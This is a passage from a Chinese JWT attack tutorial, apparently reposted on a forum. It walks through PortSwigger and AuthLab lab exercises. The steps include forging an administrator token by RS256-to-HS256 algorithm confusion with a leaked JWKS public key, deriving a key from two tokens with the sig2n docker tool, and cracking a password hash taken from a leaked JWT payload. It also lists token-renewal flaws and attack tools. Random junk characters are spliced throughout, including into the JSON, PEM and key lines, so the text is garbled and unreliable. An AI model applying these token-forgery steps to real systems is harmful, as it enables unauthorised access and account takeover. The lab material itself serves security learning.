"n": "o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ"
},
6 q# H1 n" `4 l7 a
{
* P0 o8 X( ^5 h+ j
"kty": "RSA",
/ x# T( T \/ _5 \& b! k
"e": "AQAB",
"kid": "d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA",
"n": "fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw"
# d8 R3 n' U4 V, u' i$ y
}
]
}0 k% p, A4 W. C- O
于是乎我们可以直接访问/jwks.json接口获取到服务器的公钥信息,在此处我们将JWK复制下来,作为我们第二部的RSA Key
: X7 j$ V( [% `+ G' j2 C% e; q
https://0aad003404004c0b817dcff9 ... ademy.net/jwks.json+ @- b$ P0 E" z+ [) n1 ^8 W- g( h; ^
+ s+ D3 m+ U% o v* C
{
"keys": [
; R; Q' K0 v7 t) P/ R) a' b' u( M
{
! L+ L1 U3 T* \) U2 K: k
"kty": "RSA",
6 E" V4 N) K3 y! }9 R" B% |
"e": "AQAB",
"use": "sig",
"kid": "63624c36-bfd8-4146-888e-6d032ad4fe18",
' [% r7 I7 c5 `" Q" a
"alg": "RS256",
3 [/ H2 D2 e5 U8 {0 I5 |
"n": "zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw"
0 U0 U* Z: ^, T, d( m
}
]
# U+ _9 h* d- w
}" L. l G7 E5 h4 r, a
# ]+ {; T2 C' ^' N2 E
Step 5:在Burpsuite的JWT Editor Keys中点击"New RSA Key",用之前泄露的JWK而生成一个新的RSA Key
- ~; T3 v# V1 `; K
{
"kty": "RSA",
0 J( A9 m# Q1 V) X* y# A Z
"e": "AQAB",
"use": "sig",
) M! {# i' \" q/ I6 ?
"kid": "63624c36-bfd8-4146-888e-6d032ad4fe18",
" M+ S9 K1 W2 L9 A T! k a
"alg": "RS256",
2 _" u- d- ?( P/ K5 F/ A
"n": "zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw"
}
' _$ m* L- c( e" d * R6 ~. _1 A4 |2 f/ U6 G
0 s- r) ^" z) G t S0 [ Step 6:选中"Copy Public Key as PEM",同时将其进行base64编码操作,保存一下得到的字符串(备注:上下的一串-----END PUBLIC KEY-----不要删掉)
( Z; x; w( w& N* p0 b. V/ P: b" @4 c( J* o6 R6 \4 {; T6 e% h b
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzsiIsVqAKSpOnOxMKrI0
) h0 t9 m2 K( s4 E. D$ v3 @6 v
hT3p8m/NK3VoejFnt4Hx2CFzvJsZ4/9mmoIVwi/nXYr7NtNV7stOSS4MGzYdJ57t
7 l3 @9 e# ?. E
4v83B9h7uI1fdKSp+L+cisg31S0Wm5B/LDnvuABFMcShJ+DKTgEYfLHaG31Judly
JdnfgNIIa0XL+wbGh7Xshf8RtzR8FC2DfApX/+KXYNnHxnTKTPXl5unBgCxyny2n
3 s4 N6 {, I. x6 k2 V
2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY+E2
FXIoPIt8m/VSXlsKyZpjpfXTJJZo/IqazAl1XBW6bjwWjxwee0Xbyt7M1/1dTKja
# P. g+ @6 Z9 |9 _* W* O$ }) D# ?2 ^) l m- m
AwIDAQAB
-----END PUBLIC KEY-----. l: F2 s2 Q2 p
base64后结果:
5 w* {, {; g; ?7 a: c; e& y9 K4 u LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6c2lJc1ZxQUtTcE9uT3hNS3JJMApoVDNwOG0vTkszVm9lakZudDRIeDJDRnp2SnNaNC85bW1vSVZ3aS9uWFlyN050TlY3c3RPU1M0TUd6WWRKNTd0CjR2ODNCOWg3dUkxZmRLU3ArTCtjaXNnMzFTMFdtNUIvTERudnVBQkZNY1NoSitES1RnRVlmTEhhRzMxSnVkbHkKSmRuZmdOSUlhMFhMK3diR2g3WHNoZjhSdHpSOEZDMkRmQXBYLytLWFlObkh4blRLVFBYbDV1bkJnQ3h5bnkybgoyQ3dvQ0lpWWV0N3M3WDFjM3Fod2t0V2s2eEpUbXZrcmQ4NUtCbERTeUVqQmhFUFBYcmJWZnFvOHNOeGtZK0UyCkZYSW9QSXQ4bS9WU1hsc0t5WnBqcGZYVEpKWm8vSXFhekFsMVhCVzZiandXanh3ZWUwWGJ5dDdNMS8xZFRLamEKQXdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==
2 ^2 ?1 Q1 |+ g% n) g! C
1 Z' ~9 T. q) [4 v1 ?Step 7:在JWT Editor Keys处,生成新的对称加密Key,用之前保存的base64编码去替换k的值+ F& y+ _+ a3 [
% N5 [3 ~! y. h3 A6 G
{
# r) c8 a& W; U. ~4 k: l/ n @- ~3 v
"kty": "oct",
0 x% h* J: A* J% j
"kid": "63b7b785-4d35-4cb7-bbc6-9d9e17dcf5fe",
6 O8 ]1 H8 Z6 m& N/ L
"k": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6c2lJc1ZxQUtTcE9uT3hNS3JJMApoVDNwOG0vTkszVm9lakZudDRIeDJDRnp2SnNaNC85bW1vSVZ3aS9uWFlyN050TlY3c3RPU1M0TUd6WWRKNTd0CjR2ODNCOWg3dUkxZmRLU3ArTCtjaXNnMzFTMFdtNUIvTERudnVBQkZNY1NoSitES1RnRVlmTEhhRzMxSnVkbHkKSmRuZmdOSUlhMFhMK3diR2g3WHNoZjhSdHpSOEZDMkRmQXBYLytLWFlObkh4blRLVFBYbDV1bkJnQ3h5bnkybgoyQ3dvQ0lpWWV0N3M3WDFjM3Fod2t0V2s2eEpUbXZrcmQ4NUtCbERTeUVqQmhFUFBYcmJWZnFvOHNOeGtZK0UyCkZYSW9QSXQ4bS9WU1hsc0t5WnBqcGZYVEpKWm8vSXFhekFsMVhCVzZiandXanh3ZWUwWGJ5dDdNMS8xZFRLamEKQXdJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg=="
}$ q ?* v$ j5 E. f- ?& R" A
Step 8:捕获请求数据报并将其发送到repeat模块9 s3 @9 Z- p* |: v1 G
, o5 M4 R" n$ M+ I! f5 y% \* q6 h " e- M" d' G7 F4 ?( F
此时直接请求/admin是无法请求到的8 V$ {, B! Q4 w/ _4 C& V
0 q2 w9 T( E- X4 [. I, |L, t( ]' k; c* b4 ?
' {* y i) i3 RStep 9:随后修改alg为HS256,修改sub为administrator并进行Sign操作$ ?3 I/ E( N- F, Q, o$ i
( y6 x3 Y8 P8 B1 Z7 B/ j4 I9 f7 ~- S) i: v6 [' e$ L$ g M0 N1 w* b: [, h, v
" e- ~" k- Y! E4 X Step 10:重新发送数据包可以看到回显成功& C, d7 p& d2 {* X
% Y* F* A4 {) r
& F( d) N8 j( X/ lStep 11:请求敏感连接删除用户完成解题
1 ?5 g5 ^) d2 I- X: e, ]3 Y ]; G, v5 c5 T# J. v
8 v9 m6 B' O$ k+ r! [$ u; Y0 Y1 d) C6 Q4 f. X7 _1 _ p5 `
令牌派生公钥
6 M0 I5 ^0 [" ^) q1 a9 W4 q& k' X0 c# f3 N9 c 基本介绍# T9 Z- w8 \) M; ?
( G& V) O- N0 Q! p, P) L
在公钥不可用的情况下您仍然可以通过使用jwt _ forgery.py之类的工具从一对现有的JWT中获取密钥来测试算法混淆,您可以在rsa_sign2n GitHub存储库中找到几个有用的脚本
https://github.com/silentsignal/rsa_sign2n3 H/ P4 n% `6 U7 r+ y
4 X% r. D5 l2 @" B6 [& G , q' j2 b* m6 F' Q" r7 \
$ G, s- J( G/ E" P- R1 }6 L1 A% d$ C* y" r, K. H" W$ g 简易示例
, ^3 M$ x$ s1 q8 e) J' D. k4 Q9 ]
靶场地址:
, ~ G- h8 j% t( v
https://portswigger.net/web-secu ... with-no-exposed-key
( X# m4 ]& V% J6 s/ I2 I. T 5 H: F0 O$ i/ _
# K( l2 }% ?8 s( |. r, k! E7 h+ U- b Step 1:安装常规操作登录登出,再登录,获取两个JWT4 X) e* @; U0 S- {/ `& t
, j" |' @5 c+ U6 ]% | , e6 D& f! I [2 Z- U- w. M
2 |: w9 F& j% @% [5 ?* b: I 随后将其放到Port提供的docker工具里面运行,运行的命令如下
# r1 z! ^. `& ^& U+ y. h, e0 I6 t2 W% E5 `" j. u docker run --rm -it portswigger/sig2n <token1> <token2>/ p7 t4 I. o! D" z: S( `
4 @+ v" H, h# \8 j
. g; Y0 k2 D5 h/ ?/ Q- h: g# ^! I9 f: w2 Y: i9 f jwt _ forgery.py脚本会输出一系列token的存在情况值9 |5 y* ~9 D7 H
2 h7 H) C& S7 I8 Y( c ' J5 W/ H( V* Y0 f$ y) x3 _8 c7 A6 Q
, C3 z3 U5 W: C. S Step 2:这里我们尝试每一个Tempered JWT,Port这里给了提示说是X.509 形式的,所以我们只需要将X.509形式的JWT进行验证即可,当Response回应200时代表token是有效的,若为302则代表了重定向,下图是一个成功的案例+ Q* L& ]4 I( {9 ]( z# F
4 {' X4 p5 [9 j' {* g4 }; q6 U
# C+ Y& i/ b" \) I Step 3:将JWT的Base64编码拿过来先放到记事本里面暂存,在Burpsuite的JWT Editor Keys点击New Symmetric Key,将上面的Base64编码拿过来替换此对称密钥的k值,生成对称密钥之后进行和之前攻击一致的Sign操作
. Q) B; b& N9 e* M4 B! y0 \" \6 b4 C# |5 F
0 D% L0 k0 K! W% u) W 敏感信息泄露
# _, P9 E, {' \& h( ^9 Y7 k3 J7 n& _7 n- z$ M" C/ a! l/ X# h7 V 基本介绍
2 t1 l9 a! ?9 iJWT敏感信息泄露是指攻击者通过某种方式获取了JWT中包含的敏感信息,例如:用户的身份、权限或其他敏感数据,这种攻击可能会导致恶意用户冒充合法用户执行未经授权的操作或者访问敏感信息,常见的JWT敏感信息泄露方式包括:
简易示例
: H- Z3 \% S1 t. L4 l. c; u 靶场地址:https://authlab.digi.ninja/Leaky_JWT
# P$ _4 {' n( W, b7 m靶场JWT信息如上所示,而在实战中我们可以去抓包,如果抓到的数据包中有类似这样的JWT认证那我们就可以直接拿去解密了,我们拿到的数据是这样的:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6ImFkbWluIiwicGFzc3dvcmQiOiIyYWM5Y2I3ZGMwMmIzYzAwODNlYjcwODk4ZTU0OWI2MyIsInVzZXJuYW1lIjoiam9lIn0.6j3NrK-0C7K8gmaWeB9CCyZuQKfvVEAl4KhitRN2p5k
. w2 s2 G" G$ J4 g& r
上面是一个标准的JWT认证的格式,其包含Header、Payload、Signature三个部分,每个部分之间又以"."号分割,他这里的JWT认证是经过base64加密的,所以我们这里先要拿到base64解密网站去解密一下
https://base64.us/$ M$ `4 M* c. A8 F
$ E1 S0 D; ~8 L
8 M5 M& X% y( `8 H- q! I: x在这里我们可以看到payload部分的数据解密出来后包含password字段信息,后面解出来的是一串MD5数据,之后我们将其拿到MD5在线解密网站进行解密操作:# V9 R+ A @* A( C! ^. j3 I
L3 q% L" G, H2 a0 G/ Q( i 2 y" g& O6 J5 B5 H
# e3 Z0 K, m) e+ D# F$ {随后得到密码Password1并使用其作为密码,使用joe作为用户名进行登录操作:" v: }3 k- I; e6 r5 X
' ~: Q F, o1 u) _- k8 T& P# Z' O2 l8 M& x6 \$ B8 K6 | : w. B$ Y7 |, p& Q- b5 I+ u' p
+ F1 c+ d$ A& ]# W% p6 P8 Q# _7 n 随后成功登录:
2 T4 `. X9 w, IM( M E- q# f$ Q9 m # s; s5 ?- ? x& A4 p
密钥硬编码类$ V! q: J1 P5 \# A5 u* Y
3 S0 s0 ~8 Z( w2 h: H( A3 i+ w* N% {' T 基本介绍2 a# o* ^; j+ E
JWT中的密钥是用于对令牌进行签名或加密的关键信息,在实现JWT时密钥通常存储在应用程序代码中即所谓的"硬编码",这种做法可能会导致以下安全问题:
9 Z. @. O5 |3 u& h: g' P2 |! a# Y8 j8 f' t 漏洞案例
JWT密钥硬编码:
) z. n# D, X0 i 9 V S' N: Q9 Y6 o5 i1 j! g
会话续期! L& y, c$ J9 h3 i; n' j
9 M8 s1 x- ` ?续期机制
( d# D6 G: a1 r/ R6 Q, O, x+ s( l! Q. |, Y JWT(JSON Web Token)的续期机制是指在JWT过期之后通过一定的方式来更新JWT令牌,使其可以继续使用以减少用户需要频繁重新登录的情况,常见的JWT续期机制包括:
! p/ V, j% m6 d3 E4 f续期问题8 \# M$ V# q+ h( ]
0 S9 A' m$ P& }) F无限使用
& H3 E8 r* S) q0 I: _) `% e2 X6 h! S5 V" _: D 用户登录成功获取到一个JWT Token,JWT Token由包含算法信息的header和包含用户非敏感信息的body以及对header和body数据签名后的sing值拼接base64后生成,body中包含用户token失效时间戳exp(默认1小时)、用户id标识u& m3 N! h5 l0 |0 I D
, b+ K% w6 }/ S/ X8 zJWT Token有效期为1小时1 a }1 Z8 q0 ?" Q) \) j. ]" @
* @% B: D3 `/ u" P, F4 _0 o
\! j% s8 [% b. M, [
) a7 J2 l& I2 ]9 E: [: E* o# b 5 e2 J7 p, }2 u" A! K6 q
但是在过期后发现使用之前过期的JWT Token可以继续进行会话操作5 m) P" W' }7 Y4 Z, E
* X7 v9 n$ [5 Q7 j: U9 a1 A# j+ j9 _/ Q! S8 H" `7 G; p$ B : `, x; O1 ?# B- r3 V: r. ~; U" J( V3 P
Token刷新缺陷' V2 z+ r, E. z- {. |" e6 p
9 o- r! l" d0 K ?! Y yJWT Token在续期设计时由于代码编写错误将新老token更新逻辑设计错误,使得新Token和老Token一致,导致JWT 续期失败0 x7 T7 \& B0 A% Y0 j7 [" Z8 | x
# C9 ?/ ^, y) ~! r! y- k: P) |+ [ A 测试效果如下:
' O6 A) R( ]1 U5 o5 _- P2 [9 q' W; O0 [$ G6 w% z, M + B3 \7 L ?7 x. c
N个新Token生成$ n, l) n1 D9 y. ]% g. k/ T) V7 ]9 C
功能测试时发现JWT Token首次生成时默认失效时120分钟,续期业务逻辑中仅在JWT Token的后1/3时间,也就是80-120分钟时进行续期操作,在此期间用户的Token会进行刷新操作,使用新的Token请求到服务器段,服务器端会返回一个新的JWT Token到前端,供前端使用,但是在续期期间旧的Token可以无限制生成多个有效的JWT Token,存在一定程度上的被利用风险+ R, W) E1 @' H% o8 b& F
7 v3 S0 R! t" K+ a2 ^: S4 F% I* o9 R/ h g4 v 5 N: M( N* l8 F' O* g! J. V4 P
8 n8 k( a4 q; U) w& Q) W5 m( H4 `: ~2 U( i' U" h+ j: @4 p( v . `% q4 D" a7 d% S& p
7 f$ Y, g; N2 m. B/ J; B, P 工具集合3 |) w; d* G: W8 f h
jwt_tool+ I5 p6 v) C* h9 O9 F6 F$ Y
; A: e, v, P" D* A! u项目地址
9 |) q# I- h) I _9 ^/ V; @; [" H https://github.com/ticarpi/jwt_tool
* P, {/ _: e, a# d- ?
主要功能
v3 y, A2 ~. F) F/ z7 i$ ]0 |- }, U7 ?; H
1、检查令牌的有效性
2、测试已知漏洞:
0 z8 R$ C$ S% M
CVE-2015-2951:alg=none签名绕过漏洞
CVE-2016-10555:RS / HS256公钥不匹配漏洞
0 b. d* D) T6 [ T
CVE-2018-0114:Key injection漏洞
CVE-2019-20933 / CVE-2020-28637:Blank password漏洞
CVE-2020-28042:Null signature漏洞
9 \0 u0 W) H: q4 a
3、扫描配置错误或已知漏洞
4、Fuzz声明值以引发意外行为
0 ~) p2 k, I: v7 M9 H
5、测试secret/key file/public key/ JWKS key的有效性
6、通过高速字典攻击识别低强度key
" |4 Q. V7 j4 D1 [$ q& M+ R
7、时间戳篡改
8、RSA和ECDSA密钥生成和重建(来自JWKS文件)
9、伪造新的令牌头和有效载荷内容,并使用密钥或通过其他攻击方法创建新的签名/ c9 h5 S6 ~, S" O5 ]
使用说明) r2 s! s' S! a# [6 c/ x# S# H- t; ~
1 I' z1 u9 h: z1 e9 M3 |% _$ ~) m7 i" ]2 s# E# E https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool
- z5 ^, J; x9 w9 i; |$ ` MyJWT. }9 z: Z" O4 h7 i/ y
% ^- x: H1 W- K$ ` 项目地址5 r% Q5 O, w) k, q) D
. s4 t3 C1 B4 o% i9 M6 | https://github.com/tyki6/MyJWT/
) R# l5 @6 m. k) K4 N" q
" s, `7 { V$ l3 Q
功能说明
& z, s. ^5 b& Q- e2 a/ c! O: ^6 Y, A 辅助脚本$ ?8 ^' ^' }+ ^- z$ {
脚本地址/ `( |$ F- p, b+ y' t/ j1 \0 Q
& _2 z6 L0 {: E6 ?( U https://gist.github.com/imparabl3/efcf4a991244b9f8f99ac39a7c8cfe6f
: {) P; K' ]" B1 l* x' Y
, v% [# T" I! |& {$ q3 L/ x# A, ^9 y* x5 f6 R) } 脚本功能
4 j* `6 \9 D2 E0 x, D 用于利用CRLF漏洞的脚本8 @0 v5 ]* M; F# A2 w6 k% H- n
* `( O4 B/ M/ R3 B! u 参考链接
* m" s2 p( ?0 {, K1 `/ W" S3 ^7 }4 H; E- \6 e
https://1024tools.com/hmac
M2 ^/ t3 o. u% U1 ]- A6 N
https://github.com/ticarpi/jwt_tool
https://www.anquanke.com/post/id/236830
https://www.freebuf.com/articles/web/337347.html
https://digi.ninja/projects/authlab.php#landleakyjwt
https://attackdefense.com/challengedetails?cid=1424
https://github.com/wallarm/jwt-s ... er/jwt.secrets.list
https://portswigger.net/web-secu ... nverified-signature% |, G! o6 E0 P- _
& p1 Q' g7 t4 B. d
8 X+ S. E* `; d& l8 K+ n8 t" NL) _. @: v% B( V1 o 原文地址:https://xz.aliyun.com/t/129069 V e+ ^3 _/ `4 W
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
& c6 h& t( ~9 y5 S: u: r5 k% [$ u4 k$ ?! A2 }' Y4 i3 B, g% j
$ o4 _; R2 P% B6 V3 y l' u. W! ^" N; Y" L/ Z+ f' i" K
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |